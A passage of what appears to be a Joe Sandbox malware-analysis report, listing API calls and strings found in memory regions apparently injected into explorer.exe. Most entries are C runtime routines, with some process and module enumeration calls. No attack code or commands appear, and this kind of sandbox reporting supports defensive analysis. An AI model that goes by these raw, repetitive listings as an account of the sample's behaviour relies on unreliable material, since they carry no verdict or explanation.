                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1573762532-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8D771E
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8D7713
                                                                                                                                                                                                                            • Part of subcall function 0E8CF4B0: _getptd_noexit.LIBCMT ref: 0E8CF4B4
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E8D779D
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 0E8D77AE
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 0E8D77B9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 781512312-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B96B1E
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B96B13
                                                                                                                                                                                                                            • Part of subcall function 08B8E8B0: _getptd_noexit.LIBCMT ref: 08B8E8B4
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 08B96B9D
                                                                                                                                                                                                                          • _errno.LIBCMT ref: 08B96BAE
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 08B96BB9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 781512312-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 08B93882
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 08B9390C
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B9385F
                                                                                                                                                                                                                            • Part of subcall function 08B917AC: _getptd_noexit.LIBCMT ref: 08B917B2
                                                                                                                                                                                                                            • Part of subcall function 08B917AC: _amsg_exit.LIBCMT ref: 08B917C2
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B93911
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B9391D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 331613561-1018135373
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 08B7C2E9
                                                                                                                                                                                                                            • Part of subcall function 08B8B790: _lock.LIBCMT ref: 08B8B7A2
                                                                                                                                                                                                                            • Part of subcall function 08B7DB40: std::_Lockit::_Lockit.LIBCPMT ref: 08B7DB56
                                                                                                                                                                                                                            • Part of subcall function 08B7DB40: std::_Lockit::~_Lockit.LIBCPMT ref: 08B7DB79
                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 08B7C34E
                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 08B7C358
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 08B7C37C
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B7C38D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • : The expression contained mismatched [ and ]., xrefs: 08B7C370
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: : The expression contained mismatched [ and ].
                                                                                                                                                                                                                          • API String ID: 885392049-2484396094
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 08B7C3B9
                                                                                                                                                                                                                            • Part of subcall function 08B8B790: _lock.LIBCMT ref: 08B8B7A2
                                                                                                                                                                                                                            • Part of subcall function 08B7DB40: std::_Lockit::_Lockit.LIBCPMT ref: 08B7DB56
                                                                                                                                                                                                                            • Part of subcall function 08B7DB40: std::_Lockit::~_Lockit.LIBCPMT ref: 08B7DB79
                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 08B7C41E
                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 08B7C428
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 08B7C44C
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B7C45D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • : The expression contained mismatched [ and ]., xrefs: 08B7C440
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: : The expression contained mismatched [ and ].
                                                                                                                                                                                                                          • API String ID: 885392049-2484396094
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 3721439000-109466966
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd
                                                                                                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                                                                                                          • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd
                                                                                                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                                                                                                          • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: isdigit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2326231117-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3932841890-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2556904055-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 1632192098-109466966
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CompareString__crtmalloc
                                                                                                                                                                                                                          • String ID: p
                                                                                                                                                                                                                          • API String ID: 1736151240-2181537457
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0E8BCEE9
                                                                                                                                                                                                                            • Part of subcall function 0E8CC390: _lock.LIBCMT ref: 0E8CC3A2
                                                                                                                                                                                                                            • Part of subcall function 0E8BE740: std::_Lockit::_Lockit.LIBCPMT ref: 0E8BE756
                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 0E8BCF4E
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0E8BCF7C
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 0E8BCF8D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: bad cast
                                                                                                                                                                                                                          • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0E8BCFB9
                                                                                                                                                                                                                            • Part of subcall function 0E8CC390: _lock.LIBCMT ref: 0E8CC3A2
                                                                                                                                                                                                                            • Part of subcall function 0E8BE740: std::_Lockit::_Lockit.LIBCPMT ref: 0E8BE756
                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 0E8BD01E
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0E8BD04C
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 0E8BD05D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: bad cast
                                                                                                                                                                                                                          • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 1264244614-109466966
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0E8BD9F2
                                                                                                                                                                                                                            • Part of subcall function 0E8CC390: _lock.LIBCMT ref: 0E8CC3A2
                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0E8BDA38
                                                                                                                                                                                                                            • Part of subcall function 0E8CCB6C: setlocale.LIBCMT ref: 0E8CCB80
                                                                                                                                                                                                                            • Part of subcall function 0E8CCB6C: _Yarn.LIBCPMT ref: 0E8CCB9A
                                                                                                                                                                                                                            • Part of subcall function 0E8CCB6C: setlocale.LIBCMT ref: 0E8CCBA9
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0E8BDA57
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 0E8BDA68
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                          • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 08B7CDF2
                                                                                                                                                                                                                            • Part of subcall function 08B8B790: _lock.LIBCMT ref: 08B8B7A2
                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 08B7CE38
                                                                                                                                                                                                                            • Part of subcall function 08B8BF6C: setlocale.LIBCMT ref: 08B8BF80
                                                                                                                                                                                                                            • Part of subcall function 08B8BF6C: _Yarn.LIBCPMT ref: 08B8BF9A
                                                                                                                                                                                                                            • Part of subcall function 08B8BF6C: setlocale.LIBCMT ref: 08B8BFA9
                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 08B7CE57
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B7CE68
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID: url_blacklist
                                                                                                                                                                                                                          • API String ID: 1861546320-2937129071
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2998201375-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8CDC81
                                                                                                                                                                                                                            • Part of subcall function 0E8D23AC: _getptd_noexit.LIBCMT ref: 0E8D23B2
                                                                                                                                                                                                                            • Part of subcall function 0E8D23AC: _amsg_exit.LIBCMT ref: 0E8D23C2
                                                                                                                                                                                                                          • _inconsistency.LIBCMT ref: 0E8CDC8F
                                                                                                                                                                                                                            • Part of subcall function 0E8D4BB0: DecodePointer.KERNEL32 ref: 0E8D4BBB
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8CDC94
                                                                                                                                                                                                                          • _inconsistency.LIBCMT ref: 0E8CDCB0
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8CDCC0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3669027769-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B8D081
                                                                                                                                                                                                                            • Part of subcall function 08B917AC: _getptd_noexit.LIBCMT ref: 08B917B2
                                                                                                                                                                                                                            • Part of subcall function 08B917AC: _amsg_exit.LIBCMT ref: 08B917C2
                                                                                                                                                                                                                          • _inconsistency.LIBCMT ref: 08B8D08F
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B8D094
                                                                                                                                                                                                                          • _inconsistency.LIBCMT ref: 08B8D0B0
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B8D0C0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 823043651-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0E8B169F
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8B16E5
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8B170E
                                                                                                                                                                                                                            • Part of subcall function 0E8CD548: _errno.LIBCMT ref: 0E8CD55A
                                                                                                                                                                                                                            • Part of subcall function 0E8CD548: _invalid_parameter_noinfo.LIBCMT ref: 0E8CD565
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$CreateSnapshotToolhelp32_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 943617038-109466966
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8CDC74: _getptd.LIBCMT ref: 0E8CDC81
                                                                                                                                                                                                                            • Part of subcall function 0E8CDC74: _inconsistency.LIBCMT ref: 0E8CDC8F
                                                                                                                                                                                                                            • Part of subcall function 0E8CDC74: _getptd.LIBCMT ref: 0E8CDC94
                                                                                                                                                                                                                            • Part of subcall function 0E8CDC74: _inconsistency.LIBCMT ref: 0E8CDCB0
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 0E8DF08B
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8DF091
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 0E8DF0A4
                                                                                                                                                                                                                            • Part of subcall function 0E8CDD04: _getptd.LIBCMT ref: 0E8CDD0D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$OpenProcess
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 781224154-109466966
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 08B8D074: _getptd.LIBCMT ref: 08B8D081
                                                                                                                                                                                                                            • Part of subcall function 08B8D074: _inconsistency.LIBCMT ref: 08B8D08F
                                                                                                                                                                                                                            • Part of subcall function 08B8D074: _getptd.LIBCMT ref: 08B8D094
                                                                                                                                                                                                                            • Part of subcall function 08B8D074: _inconsistency.LIBCMT ref: 08B8D0B0
                                                                                                                                                                                                                          • __DestructExceptionObject.LIBCMT ref: 08B9E48B
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B9E491
                                                                                                                                                                                                                          • _getptd.LIBCMT ref: 08B9E4A4
                                                                                                                                                                                                                            • Part of subcall function 08B8D104: _getptd.LIBCMT ref: 08B8D10D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _callnewh.LIBCMT ref: 0E8CCD9E
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 0E8CCDAA
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: _FF_MSGBANNER.LIBCMT ref: 0E8CD73C
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: _NMSG_WRITE.LIBCMT ref: 0E8CD746
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: HeapAlloc.KERNEL32 ref: 0E8CD761
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: _callnewh.LIBCMT ref: 0E8CD77A
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: _errno.LIBCMT ref: 0E8CD785
                                                                                                                                                                                                                            • Part of subcall function 0E8CD70C: _errno.LIBCMT ref: 0E8CD790
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 0E8CCDF3
                                                                                                                                                                                                                            • Part of subcall function 0E8CD7CC: RtlPcToFileHeader.NTDLL ref: 0E8CD85B
                                                                                                                                                                                                                            • Part of subcall function 0E8CD7CC: RaiseException.KERNEL32 ref: 0E8CD89A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                          • String ID: bad allocation
                                                                                                                                                                                                                          • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _callnewh.LIBCMT ref: 08B8C19E
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 08B8C1AA
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _FF_MSGBANNER.LIBCMT ref: 08B8CB3C
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _NMSG_WRITE.LIBCMT ref: 08B8CB46
